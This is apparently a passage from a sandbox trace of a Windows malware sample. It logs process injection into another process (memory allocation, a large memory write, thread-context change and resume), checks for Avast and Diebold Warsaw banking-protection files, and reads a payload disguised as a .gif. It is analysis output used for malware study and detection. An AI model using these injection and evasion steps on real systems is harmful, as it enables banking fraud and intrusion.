[232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0249.660] ReadProcessMemory (in: hProcess=0x164, lpBaseAddress=0x7ffd9008, lpBuffer=0x580c74, nSize=0x4, lpNumberOfBytesRead=0x580c7c | out: lpBuffer=0x580c74*, lpNumberOfBytesRead=0x580c7c*=0x4) returned 1
[0249.660] VirtualAllocEx (hProcess=0x164, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0249.660] VirtualAlloc (lpAddress=0x1dc0000, dwSize=0x64000, flAllocationType=0x1000, flProtect=0x4) returned 0x1dc0000
[0249.667] WriteProcessMemory (in: hProcess=0x164, lpBaseAddress=0x400000, lpBuffer=0x1dbf778*, nSize=0x63000, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x1dbf778*, lpNumberOfBytesWritten=0x580c7c*=0x63000) returned 1
[0249.680] WriteProcessMemory (in: hProcess=0x164, lpBaseAddress=0x7ffd9008, lpBuffer=0x580c78*, nSize=0x4, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x580c78*, lpNumberOfBytesWritten=0x580c7c*=0x4) returned 1
[0249.680] SetThreadContext (hThread=0x168, lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd9000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x18f8b0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0249.680] ResumeThread (hThread=0x168) returned 0x1
[0249.680] VirtualFree (lpAddress=0x9d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0249.681] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0249.681] GlobalUnlock (hMem=0x95000c) returned 0
[0249.681] GlobalHandle (pMem=0x33d8b0) returned 0x950004
[0249.681] GlobalUnlock (hMem=0x950004) returned 0
[0249.689] Sleep (dwMilliseconds=0xe74e)
[0259.702] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0259.702] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0259.702] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0259.703] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0259.703] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170
[0259.703] SetFilePointer (in: hFile=0x170, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e678*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e678*=0) returned 0x0
[0259.703] SetFilePointer (in: hFile=0x170, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0259.703] SetFilePointer (in: hFile=0x170, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x5e000
[0259.703] SetFilePointer (in: hFile=0x170, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0259.705] GlobalLock (hMem=0x950004) returned 0x33d8b0
[0259.705] ReadFile (in: hFile=0x170, lpBuffer=0x33d8b0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0x12e68c, lpOverlapped=0x0 | out: lpBuffer=0x33d8b0*, lpNumberOfBytesRead=0x12e68c*=0x5e000, lpOverlapped=0x0) returned 1
[0259.712] CloseHandle (hObject=0x170) returned 1
[0259.713] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.714] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.714] GlobalUnlock (hMem=0x95000c) returned 0
[0259.714] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4000, uFlags=0x2) returned 0x95000c
[0259.714] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.715] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.715] GlobalUnlock (hMem=0x95000c) returned 0
[0259.715] GlobalReAlloc (hMem=0x95000c, dwBytes=0x6000, uFlags=0x2) returned 0x95000c
[0259.715] GlobalLock (hMem=0x95000c) returned 0x39f8d0
[0259.716] GlobalHandle (pMem=0x39f8d0) returned 0x95000c
[0259.716] GlobalUnlock (hMem=0x95000c) returned 0
[0259.716] GlobalReAlloc (hMem=0x95000c, dwBytes=0x8000, uFlags=0x2) returned 0x95000c
[0259.717] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0259.718] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0259.718] GlobalUnlock (hMem=0x95000c) returned 0
[0259.718] GlobalReAlloc (hMem=0x95000c, dwBytes=0xa000, uFlags=0x2) returned 0x95000c
[0259.718] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0259.719] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0259.719] GlobalUnlock (hMem=0x95000c) returned 0
[0259.719] GlobalReAlloc (hMem=0x95000c, dwBytes=0xc000, uFlags=0x2) returned 0x95000c
[0259.719] GlobalLock (hMem=0x95000c) returned 0x3af8f0
[0259.720] GlobalHandle (pMem=0x3af8f0) returned 0x95000c
[0259.720] GlobalUnlock (hMem=0x95000c) returned 0
[0259.720] GlobalReAlloc (hMem=0x95000c, dwBytes=0xe000, uFlags=0x2) returned 0x95000c
[0259.721] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.722] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.722] GlobalUnlock (hMem=0x95000c) returned 0
[0259.722] GlobalReAlloc (hMem=0x95000c, dwBytes=0x10000, uFlags=0x2) returned 0x95000c
[0259.723] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.723] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.724] GlobalUnlock (hMem=0x95000c) returned 0
[0259.724] GlobalReAlloc (hMem=0x95000c, dwBytes=0x12000, uFlags=0x2) returned 0x95000c
[0259.724] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.725] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.725] GlobalUnlock (hMem=0x95000c) returned 0
[0259.725] GlobalReAlloc (hMem=0x95000c, dwBytes=0x14000, uFlags=0x2) returned 0x95000c
[0259.725] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.726] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.726] GlobalUnlock (hMem=0x95000c) returned 0
[0259.726] GlobalReAlloc (hMem=0x95000c, dwBytes=0x16000, uFlags=0x2) returned 0x95000c
[0259.726] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.727] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.727] GlobalUnlock (hMem=0x95000c) returned 0
[0259.727] GlobalReAlloc (hMem=0x95000c, dwBytes=0x18000, uFlags=0x2) returned 0x95000c
[0259.727] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.728] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.728] GlobalUnlock (hMem=0x95000c) returned 0
[0259.728] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1a000, uFlags=0x2) returned 0x95000c
[0259.728] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.729] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.729] GlobalUnlock (hMem=0x95000c) returned 0
[0259.729] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1c000, uFlags=0x2) returned 0x95000c
[0259.729] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.730] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.730] GlobalUnlock (hMem=0x95000c) returned 0
[0259.730] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1e000, uFlags=0x2) returned 0x95000c
[0259.730] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.731] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.731] GlobalUnlock (hMem=0x95000c) returned 0
[0259.731] GlobalReAlloc (hMem=0x95000c, dwBytes=0x20000, uFlags=0x2) returned 0x95000c
[0259.731] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.731] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.731] GlobalUnlock (hMem=0x95000c) returned 0
[0259.731] GlobalReAlloc (hMem=0x95000c, dwBytes=0x22000, uFlags=0x2) returned 0x95000c
[0259.733] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0259.733] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0259.733] GlobalUnlock (hMem=0x95000c) returned 0
[0259.733] GlobalReAlloc (hMem=0x95000c, dwBytes=0x24000, uFlags=0x2) returned 0x95000c
[0259.734] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0259.734] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0259.734] GlobalUnlock (hMem=0x95000c) returned 0
[0259.734] GlobalReAlloc (hMem=0x95000c, dwBytes=0x26000, uFlags=0x2) returned 0x95000c
[0259.736] GlobalLock (hMem=0x95000c) returned 0x3df8e0
[0259.736] GlobalHandle (pMem=0x3df8e0) returned 0x95000c
[0259.736] GlobalUnlock (hMem=0x95000c) returned 0
[0259.736] GlobalReAlloc (hMem=0x95000c, dwBytes=0x28000, uFlags=0x2) returned 0x95000c
[0259.736] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.737] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.737] GlobalUnlock (hMem=0x95000c) returned 0
[0259.737] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2a000, uFlags=0x2) returned 0x95000c
[0259.737] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.738] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.738] GlobalUnlock (hMem=0x95000c) returned 0
[0259.738] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2c000, uFlags=0x2) returned 0x95000c
[0259.738] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.739] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.739] GlobalUnlock (hMem=0x95000c) returned 0
[0259.739] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2e000, uFlags=0x2) returned 0x95000c
[0259.739] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.740] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.740] GlobalUnlock (hMem=0x95000c) returned 0
[0259.740] GlobalReAlloc (hMem=0x95000c, dwBytes=0x30000, uFlags=0x2) returned 0x95000c
[0259.740] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.741] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.741] GlobalUnlock (hMem=0x95000c) returned 0
[0259.741] GlobalReAlloc (hMem=0x95000c, dwBytes=0x32000, uFlags=0x2) returned 0x95000c
[0259.741] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.741] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.741] GlobalUnlock (hMem=0x95000c) returned 0
[0259.741] GlobalReAlloc (hMem=0x95000c, dwBytes=0x34000, uFlags=0x2) returned 0x95000c
[0259.742] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.742] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.742] GlobalUnlock (hMem=0x95000c) returned 0
[0259.742] GlobalReAlloc (hMem=0x95000c, dwBytes=0x36000, uFlags=0x2) returned 0x95000c
[0259.742] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.743] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.743] GlobalUnlock (hMem=0x95000c) returned 0
[0259.743] GlobalReAlloc (hMem=0x95000c, dwBytes=0x38000, uFlags=0x2) returned 0x95000c
[0259.743] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.744] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.744] GlobalUnlock (hMem=0x95000c) returned 0
[0259.744] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3a000, uFlags=0x2) returned 0x95000c
[0259.744] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.744] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.744] GlobalUnlock (hMem=0x95000c) returned 0
[0259.744] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3c000, uFlags=0x2) returned 0x95000c
[0259.745] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.745] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.745] GlobalUnlock (hMem=0x95000c) returned 0
[0259.745] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3e000, uFlags=0x2) returned 0x95000c
[0259.745] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.746] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.746] GlobalUnlock (hMem=0x95000c) returned 0
[0259.746] GlobalReAlloc (hMem=0x95000c, dwBytes=0x40000, uFlags=0x2) returned 0x95000c
[0259.746] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.747] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.747] GlobalUnlock (hMem=0x95000c) returned 0
[0259.747] GlobalReAlloc (hMem=0x95000c, dwBytes=0x42000, uFlags=0x2) returned 0x95000c
[0259.747] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.747] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.748] GlobalUnlock (hMem=0x95000c) returned 0
[0259.748] GlobalReAlloc (hMem=0x95000c, dwBytes=0x44000, uFlags=0x2) returned 0x95000c
[0259.748] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.748] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.748] GlobalUnlock (hMem=0x95000c) returned 0
[0259.748] GlobalReAlloc (hMem=0x95000c, dwBytes=0x46000, uFlags=0x2) returned 0x95000c
[0259.748] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.750] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.750] GlobalUnlock (hMem=0x95000c) returned 0
[0259.750] GlobalReAlloc (hMem=0x95000c, dwBytes=0x48000, uFlags=0x2) returned 0x95000c
[0259.750] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.750] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.750] GlobalUnlock (hMem=0x95000c) returned 0
[0259.751] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4a000, uFlags=0x2) returned 0x95000c
[0259.751] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0259.751] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0259.751] GlobalUnlock (hMem=0x95000c) returned 0
